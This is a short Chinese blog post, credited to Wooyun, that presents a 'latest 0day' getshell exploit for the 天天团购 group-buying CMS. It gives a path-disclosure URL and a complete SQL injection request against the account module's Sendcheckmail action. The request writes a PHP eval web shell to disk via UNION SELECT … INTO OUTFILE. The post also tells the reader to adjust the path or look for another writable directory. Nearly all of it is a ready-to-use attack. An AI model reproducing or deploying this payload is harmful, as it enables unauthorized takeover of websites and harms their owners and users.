天天团购getshell最新0DAY

Leave a comment (0) 作者:adwin

/*非原创*/

先暴路径:http://www.okadwin.com/modules/admin/tttuangou.mod.php
 
然后上EXP:
http://www.okadwin.com/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,%2527%3C?php%20eval%28$_POST[%22c%22]%29;?%3E%2527%20into%20outfile%20%2527E:\web\1.php%2527%23

注意修改EXP里面的路径。根目录不能写就找找其它目录吧。
 
BY:乌云

分类:入侵渗透 | 标签: 入侵 0day getshell
分享到:

我也说两句 »